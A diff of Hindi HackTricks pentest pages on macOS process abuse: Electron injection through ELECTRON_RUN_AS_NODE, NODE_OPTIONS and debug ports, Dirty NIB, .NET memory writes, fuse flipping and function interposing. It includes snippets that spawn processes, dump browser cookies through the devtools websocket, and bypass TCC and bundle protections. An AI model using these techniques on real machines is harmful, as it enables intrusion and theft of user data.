@ -135,7 +135,7 @@ QoS वर्ग थ्रेड प्राथमिकताओं को स
4. **पृष्ठभूमि:**
- यह वर्ग उन कार्यों के लिए है जो पृष्ठभूमि में कार्य करते हैं और उपयोगकर्ता को दिखाई नहीं देते हैं। ये कार्य जैसे अनुक्रमण, समन्वय, या बैकअप हो सकते हैं। इनकी प्राथमिकता सबसे कम होती है और सिस्टम प्रदर्शन पर न्यूनतम प्रभाव पड़ता है।
QoS वर्गों का उपयोग करते हुए, डेवलपर्स को सटीक प्राथमिकता संख्याओं का प्रबंधन करने की आवश्यकता नहीं होती है, बल्कि कार्य की प्रकृति पर ध्यान केंद्रित करना होता है, और सिस्टम CPU संसाधनों का अनुकूलन करता है।
QoS वर्गों का उपयोग करते हुए, डेवलपर्स को सटीक प्राथमिकता संख्याओं का प्रबंधन करने की आवश्यकता नहीं होती है, बल्कि कार्य की प्रकृति पर ध्यान केंद्रित करना होता है, और सिस्टम CPU संसाधनों को तदनुसार अनुकूलित करता है।
इसके अलावा, विभिन्न **थ्रेड शेड्यूलिंग नीतियाँ** हैं जो शेड्यूलर द्वारा ध्यान में रखे जाने वाले शेड्यूलिंग पैरामीटर के सेट को निर्दिष्ट करती हैं। इसे `thread_policy_[set/get]` का उपयोग करके किया जा सकता है। यह रेस कंडीशन हमलों में उपयोगी हो सकता है।
@ -193,7 +193,7 @@ macos-dirty-nib.md
### जावा अनुप्रयोग इंजेक्शन
कुछ जावा क्षमताओं (जैसे **`_JAVA_OPTS`** env वेरिएबल) का दुरुपयोग करके एक जावा अनुप्रयोग को **मनमाना कोड/आदेश** निष्पादित करने के लिए बनाना संभव है।
कुछ जावा क्षमताओं (जैसे **`_JAVA_OPTS`** env वेरिएबल) का दुरुपयोग करके एक जावा अनुप्रयोग को **मनमाना कोड/आदेश** निष्पादित करने के लिए संभव है।
{{#ref}}
macos-java-apps-injection.md
@ -256,14 +256,14 @@ macos-ruby-applications-injection.md
- **पर्यावरण चर का उपयोग करना**: यह निम्नलिखित पर्यावरण चर में से किसी की उपस्थिति की निगरानी करेगा: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** और **`ELECTRON_RUN_AS_NODE`**
- **`task_for_pid`** कॉल का उपयोग करना: यह पता लगाने के लिए कि एक प्रक्रिया दूसरे की **कार्य पोर्ट** प्राप्त करना चाहती है, जो प्रक्रिया में कोड इंजेक्ट करने की अनुमति देती है।
- **इलेक्ट्रॉन ऐप्स पैरामीटर**: कोई **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** कमांड लाइन तर्क का उपयोग करके इलेक्ट्रॉन ऐप को डिबगिंग मोड में शुरू कर सकता है, और इस प्रकार इसमें कोड इंजेक्ट कर सकता है।
- **सिंबलिंक** या **हार्डलिंक** का उपयोग करना: आमतौर पर सबसे सामान्य दुरुपयोग यह है कि **हमारे उपयोगकर्ता अनुमतियों के साथ एक लिंक रखा जाए**, और **उच्च अनुमतियों** वाले स्थान की ओर इशारा किया जाए। हार्डलिंक और सिंबलिंक दोनों के लिए पहचान बहुत सरल है। यदि लिंक बनाने वाली प्रक्रिया का **लक्ष्य फ़ाइल** की तुलना में **विभिन्न अनुमतियों का स्तर** है, तो हम एक **अलर्ट** बनाते हैं। दुर्भाग्यवश, सिंबलिंक के मामले में अवरोधन संभव नहीं है, क्योंकि लिंक बनाने से पहले हमें लिंक के गंतव्य के बारे में जानकारी नहीं होती है। यह एप्पल के एंडपॉइंट सुरक्षा ढांचे की एक सीमा है।
- **इलेक्ट्रॉन ऐप्स पैरामीटर**: कोई व्यक्ति **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** कमांड लाइन तर्क का उपयोग करके एक इलेक्ट्रॉन ऐप को डिबगिंग मोड में शुरू कर सकता है, और इस प्रकार इसमें कोड इंजेक्ट कर सकता है।
- **सिंबलिंक** या **हार्डलिंक** का उपयोग करना: आमतौर पर सबसे सामान्य दुरुपयोग यह है कि **हमारे उपयोगकर्ता अनुमतियों के साथ एक लिंक रखा जाए**, और **उच्चतर अनुमतियों** वाले स्थान की ओर इंगित किया जाए। हार्डलिंक और सिंबलिंक दोनों के लिए पहचान बहुत सरल है। यदि लिंक बनाने वाली प्रक्रिया का **लक्ष्य फ़ाइल** की तुलना में **विभिन्न अनुमतियों का स्तर** है, तो हम एक **अलर्ट** बनाते हैं। दुर्भाग्यवश, सिंबलिंक के मामले में अवरोधन संभव नहीं है, क्योंकि लिंक बनाने से पहले हमें लिंक के गंतव्य के बारे में जानकारी नहीं होती है। यह Apple के EndpointSecuriy ढांचे की एक सीमा है।
### अन्य प्रक्रियाओं द्वारा किए गए कॉल
[**इस ब्लॉग पोस्ट**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) में आप देख सकते हैं कि कैसे **`task_name_for_pid`** फ़ंक्शन का उपयोग करके अन्य **प्रक्रियाओं के बारे में जानकारी प्राप्त की जा सकती है जो एक प्रक्रिया मं कोड इंजेक्ट कर रही हैं** और फिर उस अन्य प्रक्रिया के बारे में जानकारी प्राप्त की जा सकती है
[**इस ब्लॉग पोस्ट**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) में आप देख सकते हैं कि यह संभव है कि **`task_name_for_pid`** फ़ंक्शन का उपयोग करके अन्य **प्रक्रियाओं में कोड इंजेक्ट करने** के बारे में जानकारी प्राप्त की जा सके और फिर उस अन्य प्रक्रिया के बारे में जानकारी प्राप्त की जा सक
ध्यान दें कि उस फ़ंक्शन को कॉल करने के लिए आपको **वही uid** होना चाहिए जो प्रक्रिया चला रहा है या **रूट** (और यह प्रक्रिया के बारे में जानकारी लौटाता है, कोड इंजेक्ट करने का कोई तरीका नहीं)।
ध्यान दें कि उस फ़ंक्शन को कॉल करने के लिए आपको प्रक्रिया को चलाने वाले के समान **uid** होना चाहिए या **रूट** (और यह प्रक्रिया के बारे में जानकारी लौटाता है, कोड इंजेक्ट करने का कोई तरीका नहीं)।
## संदर्भ

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
View File

@ -66,11 +66,11 @@ bool readMemory(void *addr, int len, unsigned char **output) {
return true;
}
```
पूर्ण प्रमाण अवधारणा (POC) [यहा](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b) उपलब्ध है।
पूर्ण प्रमाण अवधारणा (POC) [यहा](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b) उपलब्ध है।
## मेमोरी लिखना
इसी तरह, `writeMemory` फ़ंक्शन का उपयोग करके मेमोरी में लिखा जा सकता है। प्रक्रिया में संदेश प्रकार को `MT_WriteMemory` पर सेट करना, डेटा का पता और लंबाई निर्दिष्ट करना, और फिर डेटा भेजना शामिल है:
इसी तरह, मेमोरी को `writeMemory` फ़ंक्शन का उपयोग करके लिखा जा सकता है। प्रक्रिया में संदेश प्रकार को `MT_WriteMemory` पर सेट करना, डेटा का पता और लंबाई निर्दिष्ट करना, और फिर डेटा भेजना शामिल है:
```c
bool writeMemory(void *addr, int len, unsigned char *input) {
// Increment IDs, set message type, and specify memory location
@ -86,7 +86,7 @@ return true;
## .NET Core कोड निष्पादन <a href="#net-core-code-execution" id="net-core-code-execution"></a>
कोड निष्पादित करने के लिए, एक को स्मृति क्षेत्र की पहचान करनी होती है जिसमें rwx अनुमतियाँ होती हैं, जिसे vmmap -pages: का उपयोग करके किया जा सकता है।
कोड निष्पादित करने के लिए, एक को मेमोरी क्षेत्र की पहचान करनी होती है जिसमें rwx अनुमतियाँ होती हैं, जिसे vmmap -pages का उपयोग करके किया जा सकता है।
```bash
vmmap -pages [pid]
vmmap -pages 35829 | grep "rwx/rwx"

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
View File

@ -2,11 +2,11 @@
{{#include ../../../banners/hacktricks-training.md}}
**तकनीक के बारे में अधिक जानकारी के लिए मूल पोस्ट देखें:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) और [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/)** द्वारा निम्नलिखित पोस्ट।** यहाँ एक सारांश है:
**तकनीक के बारे में अधिक जानकारी के लिए मूल पोस्ट देखें:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) और [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) **द्वारा निम्नलिखित पोस्ट।** यहाँ एक सारांश है:
### Nib फ़ाइलें क्या हैं
Nib (NeXT Interface Builder के लिए संक्षिप्त) फ़ाइलें, Apple के विकास पारिस्थितिकी तंत्र का हिस्सा, अनुप्रयोगों में **UI तत्वों** और उनके इंटरैक्शन को परिभाषित करने के लिए बनाई गई हैं। इनमें विंडो और बटन जैसी अनुक्रमित वस्तुएं शामिल हैं, और इन्हें रनटाइम पर लोड किया जाता है। उनके निरंतर उपयोग के बावजूद, Apple अब अधिक व्यापक UI प्रवाह दृश्यता के लिए Storyboards की सिफारिश करता है।
Nib (NeXT Interface Builder के लिए संक्षिप्त) फ़ाइलें, Apple के विकास पारिस्थितिकी तंत्र का हिस्सा, अनुप्रयोगों में **UI तत्वों** और उनके इंटरैक्शन को परिभाषित करने के लिए बनाई गई हैं। इनमें विंडो और बटन जैसी अनुक्रमित वस्तुएं शामिल होती हैं, और इन्हें रनटाइम पर लोड किया जाता है। उनके निरंतर उपयोग के बावजूद, Apple अब अधिक व्यापक UI प्रवाह दृश्यता के लिए Storyboards की सिफारिश करता है।
मुख्य Nib फ़ाइल का संदर्भ **`NSMainNibFile`** के मान में `Info.plist` फ़ाइल के अंदर होता है और इसे **`NSApplicationMain`** फ़ंक्शन द्वारा लोड किया जाता है, जो अनुप्रयोग के `main` फ़ंक्शन में निष्पादित होता है।
@ -32,12 +32,12 @@ display dialog theDialogText
- XCode डिबगर में चलाकर और बटन पर क्लिक करके परीक्षण करें।
#### एक अनुप्रयोग को लक्षित करना (उदाहरण: Pages)
#### एक एप्लिकेशन को लक्षित करना (उदाहरण: Pages)
1. **तैयारी**:
- लक्षित ऐप (जैसे, Pages) को एक अलग निर्देशिका (जैसे, `/tmp/`) में कॉपी करें।
- गेटकीपर समस्याओं से बचने के लिए ऐप को प्रारंभ करें और इसे कैश करें।
2. **NIB फ़ाइल को अधिलेखित करना**:
2. **NIB फ़ाइल को ओवरराइट करना**:
- एक मौजूदा NIB फ़ाइल (जैसे, About Panel NIB) को तैयार की गई DirtyNIB फ़ाइल से बदलें।
3. **निष्पादन**:
- ऐप के साथ इंटरैक्ट करके निष्पादन को ट्रिगर करें (जैसे, `About` मेनू आइटम का चयन करना)।
@ -52,7 +52,7 @@ display dialog theDialogText
### अन्य उदाहरण
पोस्ट [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) में आप एक गंदे nib बनाने के लिए ट्यूटोरियल पा सकते हैं।&#x20;
पोस्ट [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) में आप एक गंदे निब बनाने के लिए ट्यूटोरियल पा सकते हैं।&#x20;
### लॉन्च प्रतिबंधों का समाधान
@ -61,13 +61,13 @@ display dialog theDialogText
### अतिरिक्त macOS सुरक्षा
macOS Sonoma से आगे, ऐप बंडलों के अंदर संशोधन प्रतिबंधित हैं। हालाँकि, पहले के तरीकों में शामिल थे:
macOS Sonoma से आगे, ऐप बंडल के अंदर संशोधन प्रतिबंधित हैं। हालाँकि, पहले के तरीकों में शामिल थे:
1. ऐप को एक अलग स्थान (जैसे, `/tmp/`) में कॉपी करना।
2. प्रारंभिक सुरक्षा को बायपास करने के लिए ऐप बंडल के भीतर निर्देशिकाओं का नाम बदलना।
3. गेटकीपर के साथ पंजीकरण करने के लिए ऐप चलाने के बाद, ऐप बंडल में संशोधन करना (जैसे, MainMenu.nib को Dirty.nib से बदलना)।
4. निर्देशिकाओं का नाम वापस बदलना और इंजेक्ट की गई NIB फ़ाइल को निष्पादित करने के लिए ऐप को फिर से चलाना।
**नोट**: हाल के macOS अपडेट ने गेटकीपर कैशिंग के बाद ऐप बंडलों के भीतर फ़ाइल संशोधनों को रोककर इस शोषण को कम कर दिया है, जिससे यह शोषण अप्रभावी हो गया है।
**नोट**: हाल के macOS अपडेट ने गेटकीपर कैशिंग के बाद ऐप बंडल के भीतर फ़ाइल संशोधनों को रोककर इस शोषण को कम कर दिया है, जिससे यह शोषण अप्रभावी हो गया है।
{{#include ../../../banners/hacktricks-training.md}}

28
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
View File

@ -5,16 +5,16 @@
## Basic Information
यदि आप नहीं जानते कि Electron क्या है, तो आप [**यहां बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps)। लेकिन अभी के लिए बस इतना जान लें कि Electron **node** चलाता है।\
और node के कुछ **parameters** और **env variables** हैं जिन्हें **अन्य कोड निष्पादित करने** के लिए उपयोग किया जा सकता है, जो निर्दिष्ट फ़ाइल के अलावा हैं।
और node के पास कुछ **parameters** और **env variables** हैं जिन्हें **अन्य कोड निष्पादित करने** के लिए उपयोग किया जा सकता है, जो निर्दिष्ट फ़ाइल के अलावा हैं।
### Electron Fuses
इन तकनीकों पर अगली चर्चा की जाएगी, लेकिन हाल के समय में Electron ने कई **सुरक्षा ध्वज जोड़े हैं** ताकि उन्हें रोका जा सके। ये हैं [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो macOS में Electron ऐप्स को **मनमाने कोड** को **लोड करने** से **रोकने** के लिए उपयोग किए जाते हैं:
इन तकनीकों पर अगली चर्चा की जाएगी, लेकिन हाल के समय में Electron ने कई **सुरक्षा ध्वज जोड़े हैं** ताकि उन्हें रोका जा सके। ये हैं [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो macOS में Electron ऐप्स को **मनमाने कोड लोड करने** से **रोकने** के लिए उपयोग किए जाते हैं:
- **`RunAsNode`**: यदि अक्षम किया गया, तो यह कोड इंजेक्ट करने के लिए env var **`ELECTRON_RUN_AS_NODE`** के उपयोग को रोकता है।
- **`EnableNodeCliInspectArguments`**: यदि अक्षम किया गया, तो `--inspect`, `--inspect-brk` जैसे params का सम्मान नहीं किया जाएगा। इस तरह कोड इंजेक्ट करने से बचना।
- **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम किया गया, तो लोड किया गया **`asar`** **file** macOS द्वारा **मान्य** किया जाएगा। इस तरह **कोड इंजेक्शन** को इस फ़ाइल की सामग्री को संशोधित करके रोकना।
- **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो यह निम्नलिखित क्रम में लोड करने के लिए खोजने के बजाय: **`app.asar`**, **`app`** और अंततः **`default_app.asar`**। यह केवल app.asar की जांच करेगा और इसका उपयोग करेगा, इस प्रकार यह सुनिश्चित करेगा कि जब **`embeddedAsarIntegrityValidation`** फ्यूज़ के साथ **संयुक्त** किया जाता है, तो **अमान्य कोड** को **लोड करना असंभव** है।
- **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो यह निम्नलिखित क्रम में लोड करने की खोज करने के बजाय: **`app.asar`**, **`app`** और अंततः **`default_app.asar`**। यह केवल app.asar की जांच करेगा और इसका उपयोग करेगा, इस प्रकार यह सुनिश्चित करेगा कि जब **`embeddedAsarIntegrityValidation`** फ्यूज़ के साथ **संयुक्त** किया जाता है, तो **अमान्य कोड लोड करना** **असंभव** है।
- **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम किया गया, तो ब्राउज़र प्रक्रिया अपने V8 स्नैपशॉट के लिए `browser_v8_context_snapshot.bin` नामक फ़ाइल का उपयोग करती है।
एक और दिलचस्प फ्यूज़ जो कोड इंजेक्शन को रोकने वाला नहीं है:
@ -23,7 +23,7 @@
### Checking Electron Fuses
आप एक एप्लिकेशन से **इन ध्वजों की जांच** कर सकते हैं:
आप एक एप्लिकेशन से **इन ध्वजों की जांच कर सकते हैं**:
```bash
npx @electron/fuses read --app /Applications/Slack.app
@ -39,18 +39,18 @@ LoadBrowserProcessSpecificV8Snapshot is Disabled
```
### Electron फ्यूज़ को संशोधित करना
जैसा कि [**दस्तावेज़ों में उल्लेख किया गया है**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **Electron फ्यूज़** की कॉन्फ़िगरेशन **Electron बाइनरी** के अंदर होती है जिसमें कहीं **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** स्ट्रिंग होती है।
जैसा कि [**दस्तावेज़ में उल्लेख किया गया है**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **Electron Fuses** की कॉन्फ़िगरेशन **Electron बाइनरी** के अंदर कॉन्फ़िगर की जाती है जिसमें कहीं **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** स्ट्रिंग होती है।
macOS अनुप्रयोगों में यह आमतौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
```bash
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
```
आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछले स्ट्रिंग के लिए खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में "0" या "1" संख्या देख सकते हैं जो यह दर्शाती है कि प्रत्येक फ्यूज़ अक्षम या सक्षम है। बस हेक्स कोड (`0x30` का अर्थ `0` और `0x31` का अर्थ `1`) को **फ्यूज़ मानों को संशोधित करने** के लिए संशोधित करें।
आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछले स्ट्रिंग के लिए खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में एक संख्या "0" या "1" देख सकते हैं जो यह दर्शाती है कि प्रत्येक फ्यूज़ अक्षम या सक्षम है। बस हेक्स कोड (`0x30` का अर्थ `0` है और `0x31` का अर्थ `1`) को **फ्यूज़ मानों को संशोधित करने** के लिए संशोधित करें।
<figure><img src="../../../images/image (34).png" alt=""><figcaption></figcaption></figure>
ध्यान दें कि यदि आप इन बाइट्स को संशोधित करके **`Electron Framework` बाइनरी** को किसी एप्लिकेशन के अंदर **ओवरराइट** करने की कोशिश करते हैं, तो ऐप नहीं चलेगा।
ध्यान दें कि यदि आप इन बाइट्स को संशोधित करके **`Electron Framework`** बाइनरी को किसी एप्लिकेशन के अंदर **ओवरराइट** करने की कोशिश करते हैं, तो ऐप नहीं चलेगा।
## RCE कोड को Electron एप्लिकेशनों में जोड़ना
@ -66,7 +66,7 @@ Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions
ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को दरकिनार करना संभव है, एप्लिकेशन को किसी अन्य निर्देशिका (जैसे **`/tmp`**) में कॉपी करके, फ़ोल्डर **`app.app/Contents`** का नाम बदलकर **`app.app/NotCon`** करना, अपने **दुष्ट** कोड के साथ **asar** फ़ाइल को **संशोधित** करना, इसे फिर से **`app.app/Contents`** नाम देना और इसे निष्पादित करना।
आप asar फ़ाइल से कोड को अनपैक कर सकते हैं:
आप asar फ़ाइल से कोड को निकालने के लिए:
```bash
npx asar extract app.asar app-decomp
```
@ -84,9 +84,9 @@ ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
```
> [!CAUTION]
> यदि फ्यूज़ **`RunAsNode`** अक्षम है तो env var **`ELECTRON_RUN_AS_NODE`** को नदेखा किया जाएगा, और यह काम नहीं करेगा।
> यदि फ्यूज़ **`RunAsNode`** बंद है तो env var **`ELECTRON_RUN_AS_NODE`** को नजरअंदा किया जाएगा, और यह काम नहीं करेगा।
### ऐप प्लिस्ट से इंजेक्शन
### ऐप plist से इंजेक्शन
जैसा कि [**यहां प्रस्तावित है**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), आप इस env वेरिएबल का दुरुपयोग एक plist में स्थिरता बनाए रखने के लिए कर सकते हैं:
```xml
@ -123,7 +123,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
```
> [!CAUTION]
> यदि फ्यूज़ **`EnableNodeOptionsEnvironmentVariable`** **अक्षम** है, तो ऐप लॉन्च करते समय env var **NODE_OPTIONS** को **अनदेखा** करेगा जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट न हो, जिसे फ्यूज़ **`RunAsNode`** के अक्षम होने पर भी **अनदेखा** किया जाएगा।
> यदि फ्यूज़ **`EnableNodeOptionsEnvironmentVariable`** **अक्षम** है, तो ऐप लॉन्च करते समय env var **NODE_OPTIONS** को **अनदेखा** करेगा जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट न किया गया हो, जिसे फ्यूज़ **`RunAsNode`** के अक्षम होने पर भी **अनदेखा** किया जाएगा।
>
> यदि आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
@ -169,7 +169,7 @@ ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00",
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv()
```
इस [**ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डिबगिंग का दुरुपयोग किया गया है ताकि एक हेडलेस क्रोम **मनमाने स्थानों में मनमाने फ़ाइलें डाउनलोड** कर सके।
इस [**ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डिबगिंग का दुरुपयोग किया जाता है ताकि एक हेडलेस क्रोम **मनमाने स्थानों में मनमाने फ़ाइलें डाउनलोड** कर सके।
### ऐप प्लिस्ट से इंजेक्शन
@ -190,11 +190,11 @@ print(ws.recv()
## TCC Bypass पुराने संस्करणों का दुरुपयोग
> [!TIP]
> macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता है। इसलिए यदि आप **Electron एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** किसी भी पिछले तकनीकों के साथ, तो आप APP का एक पिछला संस्करण डाउनलोड कर सकते हैं और उस पर कोड इंजेक्ट कर सकते हैं क्योंकि इसे अभी भी TCC विशेषाधिकार मिलेंगे (जब तक कि Trust Cache इसे रोक न दे)।
> macOS का TCC डेमन निष्पादित एप्लिकेशन के संस्करण की जांच नहीं करता है। इसलिए यदि आप **Electron एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** किसी भी पिछले तकनीकों के साथ, तो आप APP का एक पिछला संस्करण डाउनलोड कर सकते हैं और उस पर कोड इंजेक्ट कर सकते हैं क्योंकि इसे अभी भी TCC विशेषाधिकार मिलेंगे (जब तक कि Trust Cache इसे रोक न दे)।
## गैर-JS कोड चलाना
पिछली तकनीकें आपको **Electron एप्लिकेशन की प्रक्रिया के अंदर JS कोड चलाने** की अनुमति देंगी। हालाँकि, याद रखें कि **बच्चे की प्रक्रियाएँ माता-पिता एप्लिकेशन के समान सैंडबॉक्स प्रोफ़ाइल के तहत चलती हैं** और **उनकी TCC अनुमतियाँ विरासत में लेती हैं**।\
पिछली तकनीकें आपको **Electron एप्लिकेशन की प्रक्रिया के अंदर JS कोड चलाने** की अनुमति देंगी। हालाँकि, याद रखें कि **बच्चे की प्रक्रियाएँ माता-पिता एप्लिकेशन के समान सैंडबॉक्स प्रोफ़ाइल के तहत चलती हैं** और **अपने TCC अनुमतियों को विरासत में लेती हैं**।\
इसलिए, यदि आप कैमरा या माइक्रोफ़ोन तक पहुँचने के लिए विशेषाधिकारों का दुरुपयोग करना चाहते हैं, तो आप बस **प्रक्रिया से एक और बाइनरी चला सकते हैं**
## स्वचालित इंजेक्शन

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
View File

@ -4,9 +4,9 @@
## Function Interposing
एक **dylib** बनाएं जिसमें एक **`__interpose` (`__DATA___interpose`)** सेक्शन (या एक सेक्शन जिसे **`S_INTERPOSING`** के साथ चिह्नित किया गया हो) हो जिसमें **function pointers** के ट्यूपल हों जो **original** और **replacement** functions को संदर्भित करते हैं।
एक **dylib** बनाएं जिसमें **`__interpose` (`__DATA___interpose`)** सेक्शन (या **`S_INTERPOSING`** के साथ फ्लैग किया गया सेक्शन) हो जिसमें **function pointers** के ट्यूपल हों जो **original** और **replacement** functions को संदर्भित करते हैं।
फिर, **inject** करें dylib को **`DYLD_INSERT_LIBRARIES`** के साथ (interposing मुख्य ऐप लोड होने से पहले होनी चाहिए)। स्पष्ट रूप से [**`DYLD_INSERT_LIBRARIES`** के उपयोग पर लागू **restrictions** यहाँ भी लागू होते हैं](macos-library-injection/#check-restrictions).
फिर, **`DYLD_INSERT_LIBRARIES`** के साथ dylib को **inject** करें (interposing मुख्य ऐप लोड होने से पहले होनी चाहिए)। स्पष्ट रूप से [**`DYLD_INSERT_LIBRARIES`** के उपयोग पर लागू **restrictions** यहाँ भी लागू होते हैं](macos-library-injection/#check-restrictions).
### Interpose printf
@ -84,9 +84,9 @@ Hello from interpose
### डायनामिक इंटरपोज़िंग
अब यह भी संभव है कि एक फ़ंक्शन को डायनामिक रूप से **`dyld_dynamic_interpose`** फ़ंक्शन का उपयोग करके इंटरपोज़ किया जाए। यह रन टाइम में प्रोग्रामेटिक रूप से एक फ़ंक्शन को इंटरपोज़ करने की अनुमति देता है, बजाय इसके कि इसे केवल शुरुआत से किया जाए।
अब यह भी संभव है कि एक फ़ंक्शन को डायनामिक रूप से इंटरपोज़ किया जाए, फ़ंक्शन **`dyld_dynamic_interpose`** का उपयोग करके। यह रन टाइम में प्रोग्रामेटिक रूप से एक फ़ंक्शन को इंटरपोज़ करने की अनुमति देता है, बजाय इसके कि इसे केवल शुरुआत से किया जाए।
बस **बदलने के लिए फ़ंक्शन के ट्यूपल्स और प्रतिस्थापन** फ़ंक्शन को इंगित करना आवश्यक है।
बस **बदलने के लिए फ़ंक्शन के ट्यूपल्स** और **बदलने वाले** फ़ंक्शन को इंगित करना आवश्यक है।
```c
struct dyld_interpose_tuple {
const void* replacement;
@ -99,14 +99,14 @@ const struct dyld_interpose_tuple array[], size_t count);
In ObjectiveC यह एक विधि को इस तरह से कॉल किया जाता है: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`**
यह आवश्यक है **object**, **method** और **params**। और जब एक विधि को कॉल किया जाता है, तो एक **msg भेजा जाता है** जो कि फ़ंक्शन **`objc_msgSend`** का उपयोग करता है: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
यह आवश्यक है **object**, **method** और **params**। और जब एक विधि को कॉल किया जाता है, तो एक **msg भेजा जाता है** जो फ़ंक्शन **`objc_msgSend`** का उपयोग करता है: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
ऑब्जेक्ट है **`someObject`**, विधि है **`@selector(method1p1:p2:)`** और तर्क हैं **value1**, **value2**
ऑब्जेक्ट संरचनाओं के अनुसार, एक **विधियों की सूची** तक पहुँचना संभव है जहाँ **नाम** और **विधि कोड के लिए पॉइंटर्स** **स्थित** होते हैं।
> [!CAUTION]
> ध्यान दें कि क्योंकि विधियों और कक्षाओं को उनके नामों के आधार पर एक्सेस किया जाता है, यह जानकारी बाइनरी में संग्रहीत होती है, इसलिए इसे `otool -ov </path/bin>` या [`class-dump </path/bin>`](https://github.com/nygard/class-dump) के साथ पुनः प्राप्त करना संभव है।
> ध्यान दें कि चूंकि विधियों और कक्षाओं को उनके नामों के आधार पर एक्सेस किया जाता है, यह जानकारी बाइनरी में संग्रहीत होती है, इसलिए इसे `otool -ov </path/bin>` या [`class-dump </path/bin>`](https://github.com/nygard/class-dump) के साथ पुनः प्राप्त करना संभव है।
### Accessing the raw methods
@ -232,9 +232,9 @@ return 0;
### Method Swizzling with method_setImplementation
पिछला प्रारूप अजीब है क्योंकि आप एक विधि के क्रियान्वयन को दूसरी से बदल रहे हैं। फ़ंक्शन **`method_setImplementation`** का उपयोग करके आप **एक विधि के क्रियान्वयन को दूसरी के लिए बदल** सकते हैं।
पिछला प्रारूप अजीब है क्योंकि आप एक विधि के क्रियान्वयन को दूसरी से बदल रहे हैं। फ़ंक्शन **`method_setImplementation`** का उपयोग करके आप **एक विधि के क्रियान्वयन** को **दूसरी के लिए बदल** सकते हैं।
बस याद रखें कि यदि आप इसे नए क्रियान्वयन से कॉल करने जा रहे हैं तो **मूल वाले के क्रियान्वयन का पता** **संग्रहित** करें, क्योंकि इसे ओवरराइट करने से पहले इसे ढूंढना बाद में बहुत जटिल होगा।
